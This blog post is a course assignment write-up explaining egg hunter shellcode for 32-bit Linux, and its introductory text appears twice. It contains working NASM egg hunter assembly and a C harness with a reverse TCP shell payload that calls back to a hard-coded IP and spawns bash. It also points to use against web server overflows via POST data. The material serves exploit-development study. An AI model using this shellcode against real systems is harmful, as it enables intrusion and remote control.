This is part three (3) in a seven (7) part series for the SecurityTube Linux Assembly Expert 32-bit certification challenge. You can find part one (1) here: Part 1 - Assignment 1.
You can read part two (2) here: Part 2 - Assignment 2.
In assignment three (3), we were given the following instructions:
The full code for this assignment can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/assignment-3.
Supplemental scripts can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/scripts
I must say, I really enjoyed this assignment. I had some experience with Egg Hunters during the Pentesting with Kali (PWK) course offered by Offensive Security. With my new found assembly skills though, this offered a chance to really understand some of the assembly instructions being used. For this assignment I relied heavily on the following articles:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
https://www.exploit-db.com/docs/18482.pdf
http://www.fuzzysecurity.com/tutorials/expDev/4.html
I would encourage you to read Skape's paper. It's pretty much the go to for Egg Hunter shellcode. I actually used one of his Egg Hunters with a different system call to complete this assignment. Let's break down this script. Similar to Skape's paper (section 3.2.1 - ACCESS system call), we find a system call that returns the error we're looking for 0xf2 so that we can safely dereference any pointers/areas of memory and do our best to avoid crashing the system. I found USELIB only requires one parameter and it returns the error value we're looking for. Let's take a look at the man page.

I modified the code from Skape's white paper so it would run on Kali using nasm. I needed to modify the JZ, and JNZ instructions so that they jumped to the correct label incrementer if a match wasn't found. The original code jumped back to the beginning + 0x7 upon unsuccessful match. We can see the original code plus modifications below.
The next part of this assignment was rather funny because I was having trouble thinking through how I would put my shellcode with egg to be hunted. Then I looked in shellcode.c provided in some of the example scripts in order for us to test our shellcode throughout the class. Then it dawned on me. Duh, I should be able to just create another unsigned character array. The array will get put into memory, and voila, we'll execute our egg hunter to search memory for our egg x 2 and actual shellcode. Perfect! So, we define our EGG as a preprocessor macro to make it easy to configure our EGG value as necessary. All we need to do then is to define a pointer to our function (*ret)() and assign our EGGHUNTER to it, and then finally call the function.
If everything works, we should get get our EXECVE /bin/bash -i to work. One important note, the egghunter is only 36 bytes, not the entire shellcode.

Ok, so practically speaking, where can an egg hunter like this come in handy? Well, let's consider a few important details about egg hunter shellcode. One, you have limited space in your initially compromised buffer. Two, you need to have an alternate area of memory to inject your EGG x 2 along with your shellcode and that memory space must have enough room for two (2) eggs and the shellcode. One situation where I've successfully used an egg hunter before is within an Apache vulnerability. I'll let you search for it yourself but think about why a web server would make a great candidate. Say you have an overflow situation in an HTTP header but the size of the buffer isn't big enough for your shellcode, and attempts to extend the buffer space fails miserably. If we were to use an egg hunter in such an exploit, where could we put our eggs and shellcode? If we examine how a web server handles, say, POST requests and accompanying data, we would learn this is a great place for our shellcode and eggs.
Next: Part 4 - Assignment 4
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-744
You can read part two (2) here: Part 2 - Assignment 2.
In assignment three (3), we were given the following instructions:
- Study about the Egg Hunter shellcode
- Create a working demo of the Egg Hunter
- Should be configurable for different payloads
The full code for this assignment can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/assignment-3.
Supplemental scripts can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/scripts
I must say, I really enjoyed this assignment. I had some experience with Egg Hunters during the Pentesting with Kali (PWK) course offered by Offensive Security. With my new found assembly skills though, this offered a chance to really understand some of the assembly instructions being used. For this assignment I relied heavily on the following articles:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
https://www.exploit-db.com/docs/18482.pdf
http://www.fuzzysecurity.com/tutorials/expDev/4.html
I would encourage you to read Skape's paper. It's pretty much the go to for Egg Hunter shellcode. I actually used one of his Egg Hunters with a different system call to complete this assignment. Let's break down this script. Similar to Skape's paper (section 3.2.1 - ACCESS system call), we find a system call that returns the error we're looking for 0xf2 so that we can safely dereference any pointers/areas of memory and do our best to avoid crashing the system. I found USELIB only requires one parameter and it returns the error value we're looking for. Let's take a look at the man page.

I modified the code from Skape's white paper so it would run on Kali using nasm. I needed to modify the JZ, and JNZ instructions so that they jumped to the correct label incrementer if a match wasn't found. The original code jumped back to the beginning + 0x7 upon unsuccessful match. We can see the original code plus modifications below.
global _start
section .text
_start:
; This is our egghuter
; it needs to search for
; 2 consecutive instances
; of our 'hack' string
; and then jump into, and execute
; our reverse TCP shellcode
;
; we'll try this out with the uselib syscall 86
; and hope we can find and execute our shell
; in the data section
xor edx, edx ; initialize the registers
page_alignment:
or dx, 0xfff ; helps set up for page size (0xfff = 4095)
incrementer:
inc edx ; increase edx by 1
hunter:
lea ebx, [edx + 4] ; put the address of edx plus 4 bytes
; into ebx for the syscall
xor eax, eax ; clear out eax
mov al, 0x56 ; #define __NR_uselib 86 (0x56)
int 0x80 ; call it
cmp al, 0xf2 ; compare the return value in eax
jz page_alignment ; short jump to next page if ZF set
mov eax, 0x6861636b ; copy our comparison string into eax
mov edi, edx ; mov our value in edx into edi
scasd ; compare eax with dword at edi
; (in other words, check to see if we
; have 2 consecutive strings)
jnz incrementer ; short jump if ZF not set (no match)
scasd ; make the eax comparison again (match, compare again)
jnz incrementer ; short jump if ZF not set (no match)
jmp edi ; we found a match! pwnage!!!
The next part of this assignment was rather funny because I was having trouble thinking through how I would put my shellcode with egg to be hunted. Then I looked in shellcode.c provided in some of the example scripts in order for us to test our shellcode throughout the class. Then it dawned on me. Duh, I should be able to just create another unsigned character array. The array will get put into memory, and voila, we'll execute our egg hunter to search memory for our egg x 2 and actual shellcode. Perfect! So, we define our EGG as a preprocessor macro to make it easy to configure our EGG value as necessary. All we need to do then is to define a pointer to our function (*ret)() and assign our EGGHUNTER to it, and then finally call the function.
#include <stdio.h>
#include <string.h>
#define EGG "\x68\x61\x63\x6b"
unsigned char egghunter[] = \
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04"
"\x31\xc0\xb0\x56\xcd\x80\x3c\xf2\x74\xed\xb8"
EGG
"\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";
unsigned char shellcode[] = EGG EGG \
"\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xb0"
"\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc7\xeb\x5b"
"\x5e\x31\xc0\x31\xc9\xff\x36\x66\xff\x76\x04"
"\xb0\x02\x66\x50\x89\xe0\x6a\x10\x50\x57\x31"
"\xc0\xb0\x66\x31\xdb\xb3\x03\x89\xe1\xcd\x80"
"\x31\xdb\x31\xc9\x89\xfb\xb0\x3f\xcd\x80\x41"
"\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x62\x61\x73\x68\x68\x2f\x2f\x2f\x2f"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x66\x68\x2d"
"\x69\x89\xe6\x50\x56\x53\x89\xe1\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xa0\xff\xff\xff\xc0\xa8\xfa"
"\x81\x11\x5c";
int main()
{
printf("Shellcode Length: %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}
If everything works, we should get get our EXECVE /bin/bash -i to work. One important note, the egghunter is only 36 bytes, not the entire shellcode.

Ok, so practically speaking, where can an egg hunter like this come in handy? Well, let's consider a few important details about egg hunter shellcode. One, you have limited space in your initially compromised buffer. Two, you need to have an alternate area of memory to inject your EGG x 2 along with your shellcode and that memory space must have enough room for two (2) eggs and the shellcode. One situation where I've successfully used an egg hunter before is within an Apache vulnerability. I'll let you search for it yourself but think about why a web server would make a great candidate. Say you have an overflow situation in an HTTP header but the size of the buffer isn't big enough for your shellcode, and attempts to extend the buffer space fails miserably. If we were to use an egg hunter in such an exploit, where could we put our eggs and shellcode? If we examine how a web server handles, say, POST requests and accompanying data, we would learn this is a great place for our shellcode and eggs.
Next: Part 4 - Assignment 4
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-744
Comments
Post a Comment
Please leave a comment. Keep it on topic and appropriate for all audiences.